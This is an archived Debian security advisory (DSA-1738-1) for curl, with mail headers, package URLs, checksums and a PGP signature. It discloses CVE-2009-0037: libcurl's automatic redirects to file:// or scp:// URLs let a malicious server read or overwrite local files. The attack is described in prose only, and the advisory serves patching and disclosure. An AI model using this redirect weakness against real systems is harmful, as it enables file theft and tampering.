X-policyd-weight: DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_HELO_IP=-2 (check from: .debian. - helo: .mo-p05-ob.rzone. - helo-domain: .rzone.) FROM/MX_MATCHES_NOT_HELO(DOMAIN)=0 <client�.169.146.180> <helo=mo-p05-ob.rzone.de> <from=nion@debian.org> <to�bian-security-announce@lists.debian.org>, rate: -5
X-RZG-AUTH: :KHkJeFmIefYsEPPKCBl/ZNLv/wXfcKuujweZef2IiPbnG1Hpql+PuSVCX/jCuieKXNwX-RZG-CLASS-ID: mo05
Date: Wed, 11 Mar 2009 17:46:54 +0100
From: Nico Golde <nion@debian.org>
Message-ID: <20090311164654.GB23703@ngolde.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; x-action=pgp-signed
Content-Disposition: inline
X-Mailer: netcat 1.10
X-GPG: 0x73647cff
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level:
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1738-1] New curl packages fix arbitrary file access
Priority: urgent
Resent-Message-ID: <sOUS3ZWw9cP.A.x_.Yu-tJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 11 Mar 2009 16:49:28 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA-1738-1 security@debian.org
http://www.debian.org/security/ Nico Golde
March 11th, 2009
http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : curl
Vulnerability : arbitrary file access
Problem type : remote
Debian-specific: no
CVE ID : CVE-2009-0037
Debian Bug : 518423
BugTraq ID : 33962
David Kierznowski discovered that libcurl, a multi-protocol file transfer
library, when configured to follow URL redirects automatically, does not
question the new target location. As libcurl also supports file:// and
scp:// URLs - depending on the setup - an untrusted server could use that
to expose local files, overwrite local files or even execute arbitrary
code via a malicious URL redirect.
This update introduces a new option called CURLOPT_REDIR_PROTOCOLS which by
default does not include the scp and file protocol handlers.
For the oldstable distribution (etch) this problem has been fixed in
version 7.15.5-1etch2.
For the stable distribution (lenny) this problem has been fixed in
version 7.18.2-8lenny2.
For the unstable distribution (sid) this problem has been fixed in
version 7.18.2-8.1.
We recommend that you upgrade your curl packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Debian (oldstable)
- ------------------
Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2.dsc
Size/MD5 checksum: 956 0a164bd43dbfb582a049fe3a737a375b
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5.orig.tar.gz
Size/MD5 checksum: 1897973 61997c0d852d38c3a85b445f4fc02892
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2.diff.gz
Size/MD5 checksum: 21635 47c30162c60f8192bce199f5fab0012d
Architecture independent packages:
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dev_7.15.5-1etch2_all.deb
Size/MD5 checksum: 22244 752d541336f513b3bfd0841e0868b472
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_alpha.deb
Size/MD5 checksum: 166256 709d02b9dae8f4b0c7333d6f03c31628
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_alpha.deb
Size/MD5 checksum: 816206 a36046c7827322a14d257bd3fb74010b
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_alpha.deb
Size/MD5 checksum: 818778 967acf1522d86fdf56e84e1c5b22f147
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_alpha.deb
Size/MD5 checksum: 809316 af0f20647d1a91d799dcbed6980428b7
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_alpha.deb
Size/MD5 checksum: 181392 78c3b97fba2c35b5c5d1bf1eb5f1d908
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_alpha.deb
Size/MD5 checksum: 174310 433c7e16f748f83db01989e8a249a101
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_amd64.deb
Size/MD5 checksum: 164766 6f3f68c322aa54a5000975530ded729e
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_amd64.deb
Size/MD5 checksum: 170058 f6fd6e8f7a3e030ca028a6750f666061
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_amd64.deb
Size/MD5 checksum: 772142 5d3cdfcfdaf0604aeebfc395703d6df7
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_amd64.deb
Size/MD5 checksum: 778626 490801518500a00caec9e45fb755c524
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_amd64.deb
Size/MD5 checksum: 824964 a57398dfcbd49c33060a48671bed8a02
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_amd64.deb
Size/MD5 checksum: 163446 7eaaea76d628e03e8ebdc580bff0b72b
arm architecture (ARM)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_arm.deb
Size/MD5 checksum: 756884 8eed02667e02867ad3d130a40ad4f330
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_arm.deb
Size/MD5 checksum: 762352 b5720175a10c9f7333a2e8a298aac91d
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_arm.deb
Size/MD5 checksum: 783552 72af9664d85d8aa4ca0960da19554333
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_arm.deb
Size/MD5 checksum: 160536 c9fb486fd46228488f391d57a9d6edc8
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_arm.deb
Size/MD5 checksum: 165914 b1188bf4e4da054e04b77c4e8f27ca73
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_arm.deb
Size/MD5 checksum: 162598 a60ef14833ef5f5bad0bffbda329e326
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_hppa.deb
Size/MD5 checksum: 164866 73bdea9c0a854221204e7d232a464ad7
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_hppa.deb
Size/MD5 checksum: 184262 c681c1b066c2210aa0d84f1763a14bdb
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_hppa.deb
Size/MD5 checksum: 798798 29f2ee940a221a567c8f9568202f6f85
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_hppa.deb
Size/MD5 checksum: 178932 76c87584e67d0e9957110bb805a15946
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_hppa.deb
Size/MD5 checksum: 791220 9d0a1827c563e72951420d6e869a348f
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_hppa.deb
Size/MD5 checksum: 815004 47b6884a2e5ce2224d64fdc9c5852325
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_i386.deb
Size/MD5 checksum: 163604 16def6f8c4d5068be2bba466f89dc329
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_i386.deb
Size/MD5 checksum: 759150 613d3cfa2de22d73706c4158f45a9380
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_i386.deb
Size/MD5 checksum: 766468 c32cd1d31c6078d4676b8046ddc56f07
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_i386.deb
Size/MD5 checksum: 168800 1fc225d65db9eb6508481bf2e5985d5d
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_i386.deb
Size/MD5 checksum: 163240 362b7152f99699f68c93ab89e821d8d0
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_i386.deb
Size/MD5 checksum: 800506 984abe71ca0999c8a587ed1b0042299a
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_ia64.deb
Size/MD5 checksum: 811254 1992183aa065d3782a2992ea98c22a5a
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_ia64.deb
Size/MD5 checksum: 838550 350899a4e4f86a672aeb2c3a2d011e94
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_ia64.deb
Size/MD5 checksum: 174484 ac0a064f867f61c30ebd1cd7da6ea845
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_ia64.deb
Size/MD5 checksum: 217504 032debd42a9a3cc08f65ee17097fe9d7
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_ia64.deb
Size/MD5 checksum: 225458 a6beeb5551ffe3d09341160b368bf4f6
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_ia64.deb
Size/MD5 checksum: 848606 b339d6517e49af9a30b5bed9a42c9222
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_mips.deb
Size/MD5 checksum: 784292 439b960fc26cd382f86bbfb20478d7b0
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_mips.deb
Size/MD5 checksum: 831916 dcfa7a779ae3cdac67cecf847dac0162
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_mips.deb
Size/MD5 checksum: 792482 357d60661e80f1ee887d2345a119b547
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_mips.deb
Size/MD5 checksum: 164020 c91e5b7e745e2179301d2e75be7d8ee2
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_mips.deb
Size/MD5 checksum: 165474 eff09f808ce9a23ce659aeeffea398f1
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_mips.deb
Size/MD5 checksum: 170646 650b55f89ad5530208e49e211f5aebeb
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_mipsel.deb
Size/MD5 checksum: 164056 b2cbeec53d1eef3e9d0e29adf797548b
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_mipsel.deb
Size/MD5 checksum: 792108 4fe7f7e85d02706503d1064895607831
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_mipsel.deb
Size/MD5 checksum: 165674 500cb0c319ee13c14f8d010b3c4457cc
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_mipsel.deb
Size/MD5 checksum: 811082 c61871a4ac26252046b4e161aeef2dd7
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_mipsel.deb
Size/MD5 checksum: 784546 b8ba2732071c34bbfe5c10927317f589
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_mipsel.deb
Size/MD5 checksum: 170522 0919591347253f65b44ddea61f49cbc7
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_powerpc.deb
Size/MD5 checksum: 774490 f804de8b26ea6914f0283f79f71d72b2
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_powerpc.deb
Size/MD5 checksum: 781844 b53e33260b02761cd26c8780b8e81f2b
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_powerpc.deb
Size/MD5 checksum: 173906 edf0a2342f93af56ffb18a45a934ace3
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_powerpc.deb
Size/MD5 checksum: 841666 5df4b820f0f196560bd5796d0ad1bad7
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_powerpc.deb
Size/MD5 checksum: 165134 c62f63233f70e51a732c36492fd04ae9
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_powerpc.deb
Size/MD5 checksum: 169130 44d2765d66141ceb6c6626750a098aaa
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_s390.deb
Size/MD5 checksum: 836322 26db7bd743a5c2141c6aee251a9cede0
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_s390.deb
Size/MD5 checksum: 179832 487db999849a4ac171d86d87d12d3f7f
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_s390.deb
Size/MD5 checksum: 163182 7be52b66b1f79a0d0f76d0183da4104a
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_s390.deb
Size/MD5 checksum: 768888 87b9a0f806f25692cd2f9a30bd0be9eb
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_s390.deb
Size/MD5 checksum: 172444 3d9a0b971714e2f9f6c7d15ce387bc93
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_s390.deb
Size/MD5 checksum: 774446 9c7cf8ac1154f4b8b71615ad8d48ed99
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_sparc.deb
Size/MD5 checksum: 160204 433e751e98d9010f793cfacf4c809996
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_sparc.deb
Size/MD5 checksum: 788794 2c4e9c34ccf365fa02bc1f1657e68f35
http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_sparc.deb
Size/MD5 checksum: 162412 1bab2e9e64b655babb5f1ef1b7271090
http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_sparc.deb
Size/MD5 checksum: 766110 cc724da5e7cc8b38376d1644d98a144e
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_sparc.deb
Size/MD5 checksum: 165224 671413f03a06041a824630be23ded9e9
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_sparc.deb
Size/MD5 checksum: 759596 2070bf93dadb3b3fe1aa387fb0f8e6c7
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2.diff.gz
Size/MD5 checksum: 27675 3cc8e00a5145e9f8f35823f89170ed4e
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2.dsc
Size/MD5 checksum: 1418 02c706202a50b3358769c4c1e9f1a120
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2.orig.tar.gz
Size/MD5 checksum: 2273077 4fe99398a64a34613c9db7bd61bf6e3c
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_alpha.deb
Size/MD5 checksum: 211250 dcccf85073a2826d5af6e6d438f6c9f6
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_alpha.deb
Size/MD5 checksum: 224420 33ead51af60c4e6ea8f08b16ebde1e06
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_alpha.deb
Size/MD5 checksum: 985930 c90004e19361846cbded2fb615eb60ec
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_alpha.deb
Size/MD5 checksum: 1150080 c3436b5c4979764699a7236674df93cf
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_alpha.deb
Size/MD5 checksum: 241558 7d28ddb21b9a23f2e4b6302dea9ffc36
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_alpha.deb
Size/MD5 checksum: 957810 49c87cfe63e61d4c905c2c481b1a88a2
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_amd64.deb
Size/MD5 checksum: 214620 3d0a0aa6453df3486b5910e198275f84
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_amd64.deb
Size/MD5 checksum: 1182662 c7a8138e99e78dd772758e4d1db098fe
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_amd64.deb
Size/MD5 checksum: 230526 1d8262e5c8ce1baddb748a76b836ff79
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_amd64.deb
Size/MD5 checksum: 951202 76dd51652be02ad2972cbb32df9cbe60
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_amd64.deb
Size/MD5 checksum: 208912 e66d007bbedba4d7e838045e549c64b1
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_amd64.deb
Size/MD5 checksum: 928736 6f66f5283ad91d0a2b4d56bd629e8305
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_armel.deb
Size/MD5 checksum: 223972 d139a82972490d1f706ec27cacddadac
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_armel.deb
Size/MD5 checksum: 920298 d740b279b624e6a475cb7d391f7b2c10
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_armel.deb
Size/MD5 checksum: 903750 c81c5db454d3263cd6ae51d16c933a6d
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_armel.deb
Size/MD5 checksum: 209142 e9f8cea7ff20b90a27e1a72a523b3d47
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_armel.deb
Size/MD5 checksum: 209082 a906ad9c5f72efd9cdd561aed4ca8dc9
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_armel.deb
Size/MD5 checksum: 1151506 7c7546f135977a859ddc976f73b6542d
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_hppa.deb
Size/MD5 checksum: 939250 04c83feddcf78eaca8136bd4b15bee90
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_hppa.deb
Size/MD5 checksum: 209462 8e62f5740ba733a9a8cde83f045873e2
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_hppa.deb
Size/MD5 checksum: 227528 9905b63e7ffb02e1b6da0443ad99bbf6
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_hppa.deb
Size/MD5 checksum: 244642 f127b127e9783af96664f67fab940458
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_hppa.deb
Size/MD5 checksum: 960844 5c3918da2bdb2bcb6e5775935d101600
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_hppa.deb
Size/MD5 checksum: 1173380 ef0c131c585f50dd3b1d494be681ad4c
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_i386.deb
Size/MD5 checksum: 903896 766d2afb93354dc6cfccc719ca5d3a32
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_i386.deb
Size/MD5 checksum: 923838 54e2efa56e08277cd061ec142167b8f8
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_i386.deb
Size/MD5 checksum: 1155810 b481158475101fe14cd7086dd09b00ba
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_i386.deb
Size/MD5 checksum: 228434 806b581b9cb3e7b74b4c5b38d952d496
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_i386.deb
Size/MD5 checksum: 208184 310da7a3545fdd174ae3f7cf7a05d84e
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_i386.deb
Size/MD5 checksum: 210964 fde8c7b507ef8fca75b3b95557443568
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_ia64.deb
Size/MD5 checksum: 274076 a242056cc5928023e19189e0dad47a54
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_ia64.deb
Size/MD5 checksum: 1165456 63a88f4853c990bf6a26744b25ffcd65
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_ia64.deb
Size/MD5 checksum: 991418 a81c668fb270734005c855f77fbaa1b2
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_ia64.deb
Size/MD5 checksum: 296182 959638d94a18a01ee393a5388af95e9a
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_ia64.deb
Size/MD5 checksum: 222326 8f7d1012c7920a818ff3387fd672582b
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_ia64.deb
Size/MD5 checksum: 1019228 f1ee83304b03f4e168a3077577aee4ca
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_mips.deb
Size/MD5 checksum: 1193134 69792abd2ebb8ae27741fd5380a15c7d
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_mips.deb
Size/MD5 checksum: 227940 f59a95b1a51411e2df9f7646166b8bb0
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_mips.deb
Size/MD5 checksum: 212670 38196676b77101edb8d75e050ccdfa83
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_mips.deb
Size/MD5 checksum: 950332 3d0b559a946b285580c626796bd79619
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_mips.deb
Size/MD5 checksum: 208940 c4b370ba4637c34fb90b7241d94ad26e
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_mips.deb
Size/MD5 checksum: 929246 a3250ee1c064f637f4f8b80fe67cc126
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_mipsel.deb
Size/MD5 checksum: 208632 8e7b0faa4d0fcf82d4832c88040644a4
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_mipsel.deb
Size/MD5 checksum: 1169800 fec90115dd8a0a4159eb0b32f9d2f547
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_mipsel.deb
Size/MD5 checksum: 949916 4c476dd885c52cc5de342bf739d84f65
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_mipsel.deb
Size/MD5 checksum: 212332 d9cccbe468c2228b96c662fab496a06e
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_mipsel.deb
Size/MD5 checksum: 928636 b3e28a026e7deb8cce632c63b2a7a140
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_mipsel.deb
Size/MD5 checksum: 227638 75ad8b0dd97c093ff56338d856df7383
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 941020 0f242ff442fea24f03c33af08d9e6c75
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 1179540 551daec15eb2ce16e000b2201dba167c
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 212734 57c377e5cbef3618e283a1e187045598
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 238114 440e40511e414c3a0c3a4f4bfd479a41
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 922274 73c54c0b54c83950728f60d8cc1727ea
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 222642 74220c8c71a4a5d9af54694d9777a9b0
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 223330 8c5ca7bc3655a68e2fc33d11ecc06865
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 209294 e28839caee56080274e61541e035af52
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 1190688 bd391c517d8ec4b5179f753ef73825a9
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 931312 dc473f1db5201689c7cb15f41929f780
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 239904 5f08a1a17220525e249e6dec32a21bfb
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 912728 368e5d51de6826fce49b35e728a52dda
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 207660 84f75b95a33d19a1027b281c136f38ca
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 208576 4ac3ac2bb012ba68a1872620cc90e3a3
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 1134708 3403c94f0c0c32c1e964364337132456
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 222562 990364878bde2699a2af470013f90fce
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 902436 8f221c8abaab29401bd0434b9add83c8
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 918590 2d0b3f1dc2882cc2446ed708c2f2b55e
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkm36v4ACgkQHYflSXNkfP/PaQCfe6xmnRhMoAmhLaEsVrOEwCD2
OKIAoKxDcy9wTjQb4jLMoZ1tAqSuS9jr
=eSVR
-----END PGP SIGNATURE-----
From - Wed Mar 11 18:31:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068ff
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39715-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B6D0DECF69
for <lists@securityspace.com>; Wed, 11 Mar 2009 18:22:41 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 53CAC143732; Wed, 11 Mar 2009 14:35:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
